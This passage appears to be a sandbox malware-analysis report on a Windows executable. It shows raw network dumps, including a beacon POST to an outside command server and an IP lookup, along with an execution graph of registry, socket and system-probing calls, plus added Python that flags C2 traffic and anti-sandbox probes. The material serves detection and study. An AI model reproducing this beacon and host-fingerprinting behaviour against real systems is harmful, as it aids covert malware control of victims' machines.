Dec 20, 2024 16:35:27.993652105 CET  2472               OUT        Data Raw: 5c 2f 6e 5c 2f 50 76 33 39 71 73 73 75 33 33 46 51 79 64 76 78 5c 2f 70 51 64 68 51 2b 66 35 2b 50 76 39 65 6e 51 66 35 39 75 61 58 64 5c 2f 79 7a 37 66 5c 2f 41 46 76 70 56 6e 79 2b 64 5c 2f 38 41 2b 76 72 31 2b 6d 65 33 72 37 56 56 6b 6a 2b 58
                                                          Data Ascii: \/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/yz7f\/AFvpVny+d\/8A+vr1+me3r7VVkj+X\/WfXnP8An\/IoNKfX5fqHmf8A23t1P4\/y6fjUMjeZ1z\/rP8+vvQ3Rf+uX9BTPnb2\/T\/69BoLJuzu2bP8Atlj\/AD61Vw+N38X0746+vX2z3qWTt\/rO\/wDSmyK\/Kdef9Z\/n9Ov86Dr535f18yvznfs\/7
Dec 20, 2024 16:35:27.993774891 CET  4944               OUT        Data Raw: 2f 4a 5c 2f 71 5c 2f 77 44 57 5c 2f 77 43 65 5c 2f 77 44 6e 70 7a 6d 6d 53 52 5c 2f 78 37 4e 6e 5c 2f 41 45 30 4d 76 6e 34 36 2b 76 34 5c 2f 5c 2f 72 6f 39 72 35 79 5c 2f 72 35 67 4d 32 70 48 4a 76 54 35 78 5c 2f 72 5a 66 2b 6d 33 36 66 31 78 33
                                                          Data Ascii: /J\/q\/wDW\/wCe\/wDnpzmmSR\/x7Nn\/AE0Mvn46+v4\/\/ro9r5y\/r5gM2pHJvT5x\/rZf+m36f1x360u7924TzN8cX8EX1\/z\/AF5p0f8Ac3xp5kX+s\/5YQ9\/8\/wAxTPM\/eb98n59\/59e1UdBDJH5Wx0yif+icfX0+nFDyI3zokSPH+6\/1v7ib+n15p+75o3Rf+WVxx5R\/wzTNr\/J5f\/PLzf8AnhP+f\/1+l
Dec 20, 2024 16:35:27.994050026 CET  4944               OUT        Data Raw: 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31 37 31 63 6b 54 35 55 2b 54 5c 2f 41 4c 39 35 5c 2f 70 36 66 58 5c 2f 36 38 4d 59 54 35 33 5c 2f 6a 5c 2f 41 4f 57 76 2b 66 38 41
                                                          Data Ascii: 6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/AL95\/p6fX\/68MYT53\/j\/AOWv+f8AP60FUun+H\/Ih8v8A6Y1FJ+fHm\/63rUsh\/wBjZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP\/PXj\/I7dvwpnz\/fRN\/\/AE7\/AID8z\/TinD7kf\/tT\/j4\/z600\/ed+d8f7rzP85PJ+lAe1\/
Dec 20, 2024 16:35:27.996177912 CET  2472               OUT        Data Raw: 64 34 77 2b 49 31 5c 2f 72 6c 5c 2f 4e 38 50 50 32 65 5c 2f 69 48 34 5a 30 79 53 44 34 64 65 43 39 51 38 64 57 2b 6e 58 33 69 53 48 55 64 56 38 4f 36 6a 6f 4d 2b 6a 32 75 6f 58 75 71 77 57 49 78 49 50 37 41 31 4c 78 5a 38 4d 66 44 6e 68 6e 34 6b
                                                          Data Ascii: d4w+I1\/rl\/N8PP2e\/iH4Z0ySD4deC9Q8dW+nX3iSHUdV8O6joM+j2uoXuqwWIxIP7A1LxZ8MfDnhn4k\/DDxpoXxf+G2pfGDwR8T\/Dd98RrH4cXfwz8N3nxCtPHHi7UZ\/Hvwu8DeOdL0\/wAvwr8eXni2O48CG7s7PQLiayt9Q823Evw+S8RfR74c45424oyDHcOZLxlxnhMsfHOa4Sjj8BT4gp8GR4qll2OzCo6FLJ8Zj
Dec 20, 2024 16:35:28.113584042 CET | 4944 | OUT | Data Raw: 5a 2b 75 5c 2f 32 6c 49 37 54 55 37 78 50 43 72 58 73 48 69 52 50 68 35 5a 53 77 54 57 64 70 70 64 39 70 4b 65 49 58 69 73 30 31 71 58 54 47 66 57 49 35 6b 6b 6e 54 51 50 38 41 68 4c 64 59 31 54 77 56 6f 50 68 46 5c 2f 68 4e 38 45 5c 2f 69 6c 70
                                                          Data Ascii: Z+u\/2lI7TU7xPCrXsHiRPh5ZSwTWdppd9pKeIXis01qXTGfWI5kknTQP8AhLdY1TwVoPhF\/hN8E\/ilp3ifUde8Qf2T4g1D9obwBpnxO+FXwj8MfZ\/Bc1\/r\/wAXNc8G6kdX1DQ7Gxbwz4asNO1LWfEvjDSfDcdrrd39bwdlH0W\/D7iTB5rwji8oyniSvgo0cFNZ9xXmNethc3xmOyunRpYPMsyx1CpWx2OyfMMFh6X1d4
Dec 20, 2024 16:35:28.113681078 CET | 4944 | OUT | Data Raw: 4f 52 77 63 6a 6b 63 56 78 65 74 66 44 71 38 38 53 79 2b 44 39 50 38 41 45 50 6a 66 78 58 71 76 67 62 34 65 36 68 71 65 72 65 41 5c 2f 68 72 50 71 6d 6f 74 34 45 38 48 36 72 72 64 77 6c 7a 72 75 70 2b 47 5c 2f 44 4d 75 6f 54 36 4a 6f 6d 6f 61 35
                                                          Data Ascii: ORwcjkcVxetfDq88Sy+D9P8AEPjfxXqvgb4e6hqereA\/hrPqmot4E8H6rrdwlzrup+G\/DMuoT6Jomoa5PFDLq97pem2dzqUkMb3kk7Iu38Yx30RcTlvD0cj4b4uzXEVcZSyzKMVmWPxFCjjMsymOYY3E53i8vr0MPRxFPGZjgc0zLK4UMHVwmDpUcTDEyw9bFUqlTE\/0DgPp14XOuI6me8XcDZHhaGCnnWdYbK8uwVbEYHOs
Dec 20, 2024 16:35:28.113704920 CET | 2472 | OUT | Data Raw: 41 30 43 5c 2f 38 61 5c 2f 55 30 48 68 72 51 4c 57 51 54 57 32 69 61 50 62 7a 4c 39 32 57 44 53 37 4b 47 52 66 6f 38 63 4b 73 4f 67 36 47 70 35 74 44 30 69 35 6e 57 36 75 4e 4d 30 36 34 75 55 4a 4b 58 45 31 68 62 53 7a 71 54 31 4b 7a 53 52 74 49
                                                          Data Ascii: A0C\/8a\/U0HhrQLWQTW2iaPbzL92WDS7KGRfo8cKsOg6Gp5tD0i5nW6uNM064uUJKXE1hbSzqT1KzSRtIpPchhXjVfoW5BXp5nOXGWc0MfmVHMcF9awuFy+n9TwGa1eJ6+MpYSMsNNLERr8W5pVwuLrqviaFSnl9RVnPB0pL6Sj+0E4loVcBThwFkdfA4LC5dTnQxWNzSpWxmKyiHCsMBXxFeGMhNQh\/qflEq2Hw0sPh60vri
Dec 20, 2024 16:35:28.113873959 CET | 2472 | OUT | Data Raw: 76 2b 41 61 55 2b 76 79 5c 2f 55 68 7a 74 51 48 5c 2f 50 50 50 4e 56 74 79 5c 2f 50 76 37 5c 2f 58 6e 48 54 5c 2f 41 44 33 7a 56 7a 79 5c 2f 76 5c 2f 35 5c 2f 48 2b 5a 5c 2f 4c 46 56 76 2b 57 66 33 4e 5c 2f 41 5c 2f 6c 6a 39 42 37 31 50 73 5c 2f
                                                          Data Ascii: v+AaU+vy\/UhztQH\/PPPNVty\/Pv7\/XnHT\/AD3zVzy\/v\/5\/H+Z\/LFVv+Wf3N\/A\/lj9B71Ps\/P8AD\/gmhFtB+fP+r\/55\/wCf8\/hUf\/LTZsj\/ADOf5\/8A1+2O9P8An+Tf8\/mf\/W\/D1xz09qZ94u\/3zJ6\/Xt\/Ssf33946Bg6v9G\/nVNt7M\/wA\/v+86f561awfM8v8Az1\/z\/jSSRo3P080\/5\/
Dec 20, 2024 16:35:29.162126064 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID: 1 | Source: 192.168.2.9:49709 | Destination: 185.121.15.192:80 | PID: 7696 | Process: C:\Users\user\Desktop\HZhObFuFNe.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 16:35:30.061448097 CET | 284 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 143
                                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                          Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 20, 2024 16:35:31.337925911 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID: 0 | Source: 192.168.2.9:49707 | Destination: 98.85.100.80:443 | PID: 7696 | Process: C:\Users\user\Desktop\HZhObFuFNe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:35:25 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
2024-12-20 15:35:26 UTC | 224 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 15:35:26 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
2024-12-20 15:35:26 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}
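The two sessions above are the sample's own beacon traffic: a POST to home.fivetk5ht.top that carries no User-Agent header (the "HTTP GET or POST without a user agent" signature in the report's overview), whose JSON body returns the previous server's 503 error page verbatim in the "id1" field next to "data": "Done1", and a bare GET to httpbin.org/ip to learn the host's egress address (8.46.123.189 in this run). The Python below is an added example, not part of the report or of the sample: it parses re-typed copies of those messages and flags each of those traits so the same pattern can be picked out of a larger capture. The message bytes are re-typed from the trace above; the IP-lookup hosts other than httpbin.org and the finding names are the example's own choices.

```python
"""Flag C2-style HTTP exchanges in a Joe Sandbox network trace (added example)."""
import json
from dataclasses import dataclass


@dataclass
class HttpMessage:
    direction: str   # "OUT": sent by the sample, "IN": server reply
    start_line: str  # request line or status line
    headers: dict    # header names lower-cased
    body: bytes


def parse_http(direction: str, raw: bytes) -> HttpMessage:
    """Split one raw HTTP/1.x message into start line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpMessage(direction, lines[0], headers, body)


def json_strings(body: bytes) -> list:
    """Every string value in a JSON body at any depth; [] if the body is not JSON."""
    try:
        doc = json.loads(body.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return []
    out = []

    def walk(v):
        if isinstance(v, str):
            out.append(v)
        elif isinstance(v, dict):
            for x in v.values():
                walk(x)
        elif isinstance(v, list):
            for x in v:
                walk(x)

    walk(doc)
    return out


# httpbin.org/ip is the lookup the report shows; the other hosts are a
# constructed list of common equivalents (assumption, not from the report).
IP_CHECK_HOSTS = {"httpbin.org", "api.ipify.org", "icanhazip.com", "ifconfig.me"}


def analyze_flow(messages) -> list:
    """Walk a chronologically ordered flow and return (finding, detail) pairs."""
    findings = []
    last_reply = b""   # body of the most recent server reply
    last_host = ""     # Host header of the most recent request
    for m in messages:
        if m.direction == "IN":
            last_reply = m.body.strip()
            if last_host in IP_CHECK_HOSTS:        # {"origin": "<public IP>"}
                for s in json_strings(m.body):
                    findings.append(("public_ip_observed", s))
            continue
        method, _, rest = m.start_line.partition(" ")
        path = rest.split(" ")[0]
        last_host = m.headers.get("host", "")
        where = f"{method} {last_host}{path}"
        if "user-agent" not in m.headers:
            findings.append(("no_user_agent", where))
        if last_host in IP_CHECK_HOSTS:
            findings.append(("external_ip_lookup", where))
        # The sample posts the server's previous error page back as a JSON value.
        if method == "POST" and last_reply:
            reply_text = last_reply.decode("latin-1")
            if any(reply_text in s for s in json_strings(m.body)):
                findings.append(("echoes_previous_reply", where))
    return findings


# Re-typed from the report's trace (constructed input, not captured bytes).
REPLY_503 = (b"HTTP/1.0 503 Service Unavailable\r\nCache-Control: no-cache\r\n"
             b"Connection: close\r\nContent-Type: text/html\r\n\r\n"
             b"<html><body><h1>503 Service Unavailable</h1>\n"
             b"No server is available to handle this request.\n</body></html>\n")
C2_POST = (b"POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1\r\nHost: home.fivetk5ht.top\r\n"
           b"Accept: */*\r\nContent-Type: application/json\r\nContent-Length: 143\r\n\r\n"
           b'{ "id1": "<html><body><h1>503 Service Unavailable<\\/h1>\\n'
           b'No server is available to handle this request.\\n<\\/body><\\/html>\\n", '
           b'"data": "Done1" }')
IP_GET = b"GET /ip HTTP/1.1\r\nHost: httpbin.org\r\nAccept: */*\r\n\r\n"
IP_REPLY = (b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: 31\r\n"
            b"Connection: close\r\n\r\n" b'{\n  "origin": "8.46.123.189"\n}\n')

# The 503 page the sample echoes was the reply in the session preceding the POST.
C2_FLOW = [parse_http("IN", REPLY_503), parse_http("OUT", C2_POST), parse_http("IN", REPLY_503)]
IP_FLOW = [parse_http("OUT", IP_GET), parse_http("IN", IP_REPLY)]

if __name__ == "__main__":
    for name, flow in (("c2", C2_FLOW), ("ip-check", IP_FLOW)):
        for finding in analyze_flow(flow):
            print(name, *finding)
```

The echo check is the useful one: a client that sends the server's own error page back inside a JSON field is reporting the outcome of its previous request to an operator, which a missing User-Agent alone does not establish.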



Target ID: 0
Start time: 10:35:20
Start date: 20/12/2024
Path: C:\Users\user\Desktop\HZhObFuFNe.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\HZhObFuFNe.exe"
Imagebase: 0xc20000
File size: 4'470'784 bytes
MD5 hash: 2BA7EE5357B8762915D320630E9A59B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


                                                            Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 18.9%
Total number of Nodes: 249
Total number of Limit Nodes: 40
                                                            execution_graph 67535 c3d5e0 67536 c3d652 WSAStartup 67535->67536 67537 c3d5f0 67535->67537 67536->67537 67327 c5b3c0 67328 c5b3ee 67327->67328 67329 c5b3cb 67327->67329 67333 c276a0 67329->67333 67337 c59290 67329->67337 67330 c5b3ea 67334 c276c0 67333->67334 67335 c276e6 send 67333->67335 67334->67335 67336 c276c9 67334->67336 67335->67336 67336->67330 67338 c276a0 send 67337->67338 67339 c592e5 67338->67339 67340 c59335 WSAIoctl 67339->67340 67341 c59392 67339->67341 67340->67341 67342 c59366 67340->67342 67341->67330 67342->67341 67343 c59371 setsockopt 67342->67343 67343->67341 67344 c5e400 67345 c5e412 67344->67345 67347 c5e459 67344->67347 67348 c568b0 closesocket 67345->67348 67348->67347 67349 c5b400 67350 c5b425 67349->67350 67351 c5b40b 67349->67351 67354 c27770 67351->67354 67352 c5b421 67355 c27790 67354->67355 67356 c277b6 recv 67354->67356 67355->67356 67357 c27799 67355->67357 67356->67357 67357->67352 67538 cd4720 67542 cd4728 67538->67542 67539 cd4733 67541 cd4774 67542->67539 67549 cd476c 67542->67549 67550 cd5540 closesocket 67542->67550 67544 cd482e 67544->67549 67551 cd9270 67544->67551 67546 cd4860 67556 cd4950 67546->67556 67548 cd4878 67549->67548 67564 cd30a0 closesocket 67549->67564 67550->67544 67565 cda440 67551->67565 67553 cd9297 67555 cd92ab 67553->67555 67595 cdbbe0 closesocket 67553->67595 67555->67546 67557 cd4966 67556->67557 67561 cd49c5 67557->67561 67563 cd49b9 67557->67563 67597 cdb590 if_nametoindex if_indextoname 67557->67597 67559 cd4aa0 gethostname 67559->67561 67559->67563 67560 cd4a3e 67560->67561 67598 cdbbe0 closesocket 67560->67598 67561->67549 67563->67559 67563->67561 67564->67541 67593 cda46b 67565->67593 67566 cda4db 67567 cdaa03 RegOpenKeyExA 67566->67567 67579 cdad14 67566->67579 67568 cdaa27 RegQueryValueExA 67567->67568 67569 cdab70 RegOpenKeyExA 67567->67569 67570 cdaacc RegQueryValueExA 67568->67570 67571 cdaa71 67568->67571 67572 cdac34 
RegOpenKeyExA 67569->67572 67590 cdab90 67569->67590 67573 cdab0e 67570->67573 67574 cdab66 RegCloseKey 67570->67574 67571->67570 67578 cdaa85 RegQueryValueExA 67571->67578 67575 cdacf8 RegOpenKeyExA 67572->67575 67592 cdac54 67572->67592 67573->67574 67582 cdab1e RegQueryValueExA 67573->67582 67574->67569 67576 cdad56 RegEnumKeyExA 67575->67576 67575->67579 67577 cdad9b 67576->67577 67576->67579 67580 cdae16 RegOpenKeyExA 67577->67580 67581 cdaab3 67578->67581 67579->67553 67583 cdaddf RegEnumKeyExA 67580->67583 67584 cdae34 RegQueryValueExA 67580->67584 67581->67570 67587 cdab4c 67582->67587 67583->67579 67583->67580 67585 cdaf43 RegQueryValueExA 67584->67585 67594 cdadaa 67584->67594 67586 cdb052 RegQueryValueExA 67585->67586 67585->67594 67588 cdadc7 RegCloseKey 67586->67588 67586->67594 67587->67574 67588->67583 67590->67572 67591 cdafa0 RegQueryValueExA 67591->67594 67592->67575 67593->67566 67596 cdb830 if_nametoindex if_indextoname 67593->67596 67594->67585 67594->67586 67594->67588 67594->67591 67595->67555 67596->67566 67597->67560 67598->67563 67358 cea080 67361 ce9740 67358->67361 67360 cea09b 67362 ce9780 67361->67362 67366 ce975d 67361->67366 67363 ce9925 RegOpenKeyExA 67362->67363 67362->67366 67364 ce995a RegQueryValueExA 67363->67364 67363->67366 67365 ce9986 RegCloseKey 67364->67365 67365->67366 67366->67360 67367 ceb180 67368 ceb19b 67367->67368 67374 ceb2e3 67367->67374 67371 ceb2a9 getsockname 67368->67371 67373 ceb020 closesocket 67368->67373 67368->67374 67375 ceaf30 67368->67375 67379 ceb060 67368->67379 67384 ceb020 67371->67384 67373->67368 67376 ceaf4c 67375->67376 67377 ceaf63 socket 67375->67377 67376->67377 67378 ceaf52 67376->67378 67377->67368 67378->67368 67383 ceb080 67379->67383 67380 ceb0b0 connect 67381 ceb0bf WSAGetLastError 67380->67381 67382 ceb0ea 67381->67382 67381->67383 67382->67368 67383->67380 67383->67381 67383->67382 67385 ceb029 67384->67385 67386 ceb052 67384->67386 67387 ceb04b closesocket 67385->67387 67388 ceb03e 
67385->67388 67386->67368 67387->67386 67388->67368 67389 c231d7 67392 c231f4 67389->67392 67390 c23200 67391 c232dc CloseHandle 67391->67390 67392->67390 67392->67391 67393 c58b50 67394 c58b6b 67393->67394 67412 c58bb5 67393->67412 67395 c58bf3 67394->67395 67396 c58b8f 67394->67396 67394->67412 67413 c5a550 67395->67413 67432 c36e40 select 67396->67432 67399 c58bfc 67401 c58c35 67399->67401 67402 c58c1f connect 67399->67402 67409 c58cb2 67399->67409 67399->67412 67400 c58cd9 SleepEx 67406 c58d13 67400->67406 67428 c5a150 67401->67428 67402->67401 67403 c5a150 getsockname 67408 c58dff 67403->67408 67405 c58d43 67410 c5a150 getsockname 67405->67410 67406->67405 67406->67409 67408->67412 67433 c278b0 closesocket 67408->67433 67409->67403 67409->67408 67409->67412 67410->67412 67411 c58ba1 67411->67400 67411->67409 67411->67412 67414 c5a575 67413->67414 67417 c5a597 67414->67417 67435 c275e0 67414->67435 67416 c278b0 closesocket 67418 c5a713 67416->67418 67419 c5a811 setsockopt 67417->67419 67424 c5a83b 67417->67424 67426 c5a69b 67417->67426 67418->67399 67419->67424 67421 c5af56 67422 c5af5d 67421->67422 67421->67426 67422->67418 67423 c5a150 getsockname 67422->67423 67423->67418 67424->67426 67427 c5abe1 67424->67427 67441 c56be0 select closesocket 67424->67441 67426->67416 67426->67418 67427->67426 67440 c867e0 ioctlsocket 67427->67440 67429 c5a15f 67428->67429 67431 c5a1d0 67428->67431 67430 c5a181 getsockname 67429->67430 67429->67431 67430->67431 67431->67411 67432->67411 67434 c278c5 67433->67434 67434->67412 67436 c27607 socket 67435->67436 67437 c275ef 67435->67437 67438 c2762b 67436->67438 67437->67436 67439 c27643 67437->67439 67438->67417 67439->67417 67440->67421 67441->67427 67442 c22f17 67449 c22f2c 67442->67449 67443 c231d3 67444 c22fb3 RegOpenKeyExA 67444->67449 67445 c2315c RegEnumKeyExA 67445->67449 67446 c23046 RegOpenKeyExA 67447 c23089 RegQueryValueExA 67446->67447 67446->67449 67448 c2313b RegCloseKey 67447->67448 67447->67449 67448->67449 
67449->67443 67449->67444 67449->67445 67449->67446 67449->67448 67599 c595b0 67600 c595c8 67599->67600 67602 c595fd 67599->67602 67601 c5a150 getsockname 67600->67601 67600->67602 67601->67602 67450 109ed10 67452 109ed5a 67450->67452 67451 109ed73 67452->67451 67453 109ee60 67452->67453 67454 109ee16 67452->67454 67459 fab4e0 _lock 67453->67459 67455 109ee54 67454->67455 67460 fab4e0 _lock 67454->67460 67457 109ee89 67459->67457 67460->67457 67461 fab160 Sleep 67462 c23d5e 67465 c23d30 67462->67465 67464 c23d90 67465->67462 67465->67464 67466 c30ab0 67465->67466 67469 c305b0 67466->67469 67468 c30acd 67468->67465 67472 c305bd 67469->67472 67475 c307c7 67469->67475 67470 c30707 WSAEventSelect 67470->67472 67470->67475 67471 c307ef 67471->67475 67478 c30847 67471->67478 67479 c36fa0 67471->67479 67472->67470 67472->67471 67474 c276a0 send 67472->67474 67472->67475 67474->67472 67475->67468 67476 c309e8 WSAEnumNetworkEvents 67477 c309d0 WSAEventSelect 67476->67477 67476->67478 67477->67476 67477->67478 67478->67475 67478->67476 67478->67477 67481 c36fd4 67479->67481 67482 c36feb 67479->67482 67480 c37207 select 67480->67482 67481->67480 67481->67482 67482->67478 67483 cd5a50 67484 cd5a58 67483->67484 67485 cd5ea0 67483->67485 67486 cd5b50 67484->67486 67494 cd5a99 67484->67494 67498 cd5b88 67484->67498 67489 cd5b7a 67486->67489 67490 cd5eb4 67486->67490 67486->67498 67487 cd5e96 67513 ce9480 closesocket 67487->67513 67504 cd70a0 67489->67504 67514 cd6f10 socket ioctlsocket connect getsockname closesocket 67490->67514 67493 cd5ec2 67493->67493 67497 cd70a0 6 API calls 67494->67497 67494->67498 67511 cd6f10 socket ioctlsocket connect getsockname closesocket 67494->67511 67497->67494 67498->67487 67500 cea920 67498->67500 67512 ce9320 closesocket 67498->67512 67501 cea944 67500->67501 67502 cea94b 67501->67502 67503 cea977 send 67501->67503 67502->67498 67503->67498 67507 cd70ae 67504->67507 67506 cd71a7 67506->67498 67507->67506 67508 cd717f 67507->67508 67515 cea8c0 
67507->67515 67519 cd71c0 socket ioctlsocket connect getsockname 67507->67519 67508->67506 67520 ce9320 closesocket 67508->67520 67511->67494 67512->67498 67513->67485 67514->67493 67516 cea8e6 67515->67516 67517 cea903 recvfrom 67515->67517 67516->67517 67518 cea8ed 67516->67518 67517->67518 67518->67507 67519->67507 67520->67506 67603 c229ff FindFirstFileA 67604 c22a31 67603->67604 67605 c22a5c RegOpenKeyExA 67604->67605 67606 c22a93 67605->67606 67607 c22ade CharUpperA 67606->67607 67608 c22b0a 67607->67608 67609 c22bf9 QueryFullProcessImageNameA 67608->67609 67610 c22c3b CloseHandle 67609->67610 67612 c22c64 67610->67612 67611 c22df1 CloseHandle 67613 c22e23 67611->67613 67612->67611 67521 c2255d 67522 fa9f70 67521->67522 67523 c2256c GetSystemInfo 67522->67523 67524 c22589 67523->67524 67525 c225a0 GlobalMemoryStatusEx 67524->67525 67530 c225ec 67525->67530 67526 c2263c GetDriveTypeA 67528 c22655 GetDiskFreeSpaceExA 67526->67528 67526->67530 67527 c22762 67529 c227d6 KiUserCallbackDispatcher 67527->67529 67528->67530 67531 c227f8 67529->67531 67530->67526 67530->67527 67532 c228d9 FindFirstFileW 67531->67532 67533 c22906 FindNextFileW 67532->67533 67534 c22928 67532->67534 67533->67533 67533->67534
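The execution graph above is printed flat: a node is an ID followed by its code address and zero or more API names (or a collapsed "N API calls" summary for a callee shown elsewhere), and "A->B" is an edge. Reading it by hand is slow, so the Python below is an added example, not part of the report, that parses that token stream and lists the API calls reachable from a given function. GRAPH_EXCERPT is cut from this report's own graph, reduced to four functions; one of them is the routine at c2255d whose GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA and GetDiskFreeSpaceExA calls, followed by a FindFirstFileW/FindNextFileW directory walk, are the kind of host-resource probing that the sandbox-detection signatures in the overview rest on. The RESOURCE_PROBES watch-list is the example's own assumption.

```python
"""Parse Joe Sandbox's flattened execution_graph and list reachable API calls (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Cut from this report's execution graph: WSAStartup wrapper, if_nametoindex
# helper, a node collapsed to "6 API calls", and the c2255d fingerprinting routine.
GRAPH_EXCERPT = (
    "execution_graph 67535 c3d5e0 67536 c3d652 WSAStartup 67535->67536 "
    "67537 c3d5f0 67535->67537 67536->67537 "
    "67557 cd4966 67597 cdb590 if_nametoindex if_indextoname 67557->67597 "
    "67494 cd5a99 67497 cd70a0 6 API calls 67494->67497 67497->67494 "
    "67521 c2255d 67522 fa9f70 67521->67522 67523 c2256c GetSystemInfo 67522->67523 "
    "67524 c22589 67523->67524 67525 c225a0 GlobalMemoryStatusEx 67524->67525 "
    "67530 c225ec 67525->67530 67526 c2263c GetDriveTypeA 67528 c22655 GetDiskFreeSpaceExA "
    "67526->67528 67526->67530 67527 c22762 67529 c227d6 KiUserCallbackDispatcher "
    "67527->67529 67528->67530 67531 c227f8 67529->67531 67530->67526 67530->67527 "
    "67532 c228d9 FindFirstFileW 67531->67532 67533 c22906 FindNextFileW 67532->67533 "
    "67534 c22928 67532->67534 67533->67533 67533->67534"
)

HEX_ADDR = re.compile(r"[0-9a-f]{5,8}")  # code address that follows a node id
SUMMARY = re.compile(r"\d+ API calls")    # collapsed callee, not a real API name


@dataclass
class Node:
    nid: str
    addr: str
    labels: list = field(default_factory=list)

    @property
    def apis(self) -> set:
        text = " ".join(self.labels)
        return set() if SUMMARY.fullmatch(text) else set(self.labels)


@dataclass
class Graph:
    nodes: dict = field(default_factory=dict)                      # id -> Node
    edges: dict = field(default_factory=lambda: defaultdict(set))  # id -> {id}


def parse_execution_graph(text: str) -> Graph:
    """Tokens are 'ID ADDR [label ...]' for nodes and 'A->B' for edges."""
    g = Graph()
    toks = text.split()
    cur = None
    i = 0
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            src, dst = t.split("->", 1)
            g.edges[src].add(dst)
        elif t.isdigit() and i + 1 < len(toks) and HEX_ADDR.fullmatch(toks[i + 1]):
            cur = Node(t, toks[i + 1])
            g.nodes[t] = cur
            i += 1  # the address token is consumed with the id
        elif cur is not None and t != "execution_graph":
            cur.labels.append(t)  # an API name, or a word of a summary
        i += 1
    return g


def apis_reachable(g: Graph, root_addr: str) -> set:
    """Union of API names on every node reachable from the function at root_addr."""
    start = next((n.nid for n in g.nodes.values() if n.addr == root_addr), None)
    if start is None:
        raise KeyError(root_addr)
    seen, todo, apis = set(), [start], set()
    while todo:
        nid = todo.pop()
        if nid in seen or nid not in g.nodes:
            continue
        seen.add(nid)
        apis |= g.nodes[nid].apis
        todo.extend(g.edges.get(nid, ()))
    return apis


# Assumed watch-list: host-resource probes (CPU count, RAM, disk size, drive type)
# that anti-sandbox checks commonly compare against minimum thresholds.
RESOURCE_PROBES = {"GetSystemInfo", "GlobalMemoryStatusEx", "GetDriveTypeA", "GetDiskFreeSpaceExA"}


def resource_probes(g: Graph, root_addr: str) -> list:
    """Sorted resource-probe APIs the function at root_addr reaches."""
    return sorted(apis_reachable(g, root_addr) & RESOURCE_PROBES)


if __name__ == "__main__":
    graph = parse_execution_graph(GRAPH_EXCERPT)
    for addr in ("c2255d", "c3d5e0", "cd4966", "cd5a99"):
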